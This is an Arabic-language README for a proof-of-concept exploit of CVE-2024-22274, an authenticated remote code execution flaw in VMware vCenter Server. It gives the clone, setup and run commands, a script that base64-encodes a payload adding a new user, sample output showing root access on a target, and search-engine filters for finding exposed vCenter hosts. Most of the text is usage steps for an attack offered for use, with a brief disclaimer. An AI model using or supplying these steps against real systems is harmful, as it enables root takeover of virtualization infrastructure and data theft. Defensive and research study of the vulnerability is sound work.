
PoC - تنفيذ التعليمات البرمجية عن بُعد مع المصادقة في VMware vCenter Server (استغلال)
مكونات واجهة برمجة التطبيقات "com.vmware.appliance.recovery.backup.job.create" و "com.vmware.appliance.recovery.backup.validate" معرضة لهجوم حقن علم يمكن استغلاله لتنفيذ أوامر عشوائية كمستخدم الجذر على النظام المستهدف.
[!NOTE] للعمل مع إثبات المفهوم هذا، يجب أن تمتلك بيانات اعتماد صالحة وأن تسجل الدخول إلى شل VMware vCenter Server عبر SSH. يجب أن يكون لدى المستخدم دور "المسؤول"، كما هو محدد في ملف
vcenter_creds.txt.
$ git clone https://github.com/l0n3m4n/CVE-2024-22274-RCE.git
$ cd CVE-2024-22274-RCE
$ python3 -m venv venv && source venv/bin/activate
$ pip install -r requirements.txt
قم بتشغيل أو تعديل
user2base64.shلتشفير المستخدم الجديد المضاف إلى base64 وسينشئ تلقائياًpayload.txt
$ bash user2base64.sh
Payload has been encoded to base64, saved payload.txt


$ python3 CVE-2024-22274-RCE.py -t 192.168.56.103 -P 22 -p payload.txt -c vCenter_creds.txt
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output:
uid=0(root) gid=0(root) groups=0(root)
[+] Exploitation successful: You have root access.
[+] Finished executing commands on 192.168.56.103
هذا المثال يعني أنك تتصل ولكن الحمولة لم تُكوّن أو تُحمّل بشكل صحيح. راجع إثبات المفهوم PDF للحصول على معلومات أكثر تفصيلاً.
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output:
No privileges escalation detected.
[+] Exploitation failed: Root access not obtained.
[+] Finished executing commands on 192.168.56.103
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[-] Error: Username or password not found in configuration file.
يرجى التحقق من عنوان المضيف وبيانات الاعتماد.
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[-] Error: [SSH Error] Connection to 192.168.56.103 failed.
"VMware vCenter"، المرشح: services.port: 443 AND tags: "VMware"title="VMware vCenter"، المرشح: port="443" && title="VMware vCenter""VMware vCenter"، المرشح: port:443 "VMware vCenter"إثبات المفهوم هذا لن يكون فعالاً إذا لم تفهم كيفية تفسير السكريبت، حيث تم تغييره عمداً لمنع "script kiddies" من مجرد نسخه وتشغيله دون فهم. VMware vCenter Server هو مكون حاسم في إدارة البيئات الافتراضية، إذا تمكن شخص من الوصول إليه يمكنه الحصول على سيطرة كاملة على البنية التحتية الافتراضية واستخراج البيانات الحساسة. تم تصميم إثبات المفهوم هذا لمن لديهم بالفعل خبرة تقنية صغيرة لاستخدامه بشكل صحيح، لذا إذا كنت من فئة script kiddies وتهدف إلى إحداث اضطراب دون فهم الآثار، فإن هذا الاستغلال لن يكون مفيداً لك.
تم توفير هذه الأداة لأغراض تعليمية وبحثية فقط. لا يتحمل المنشئ أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن الأداة. إنشاء مشكلة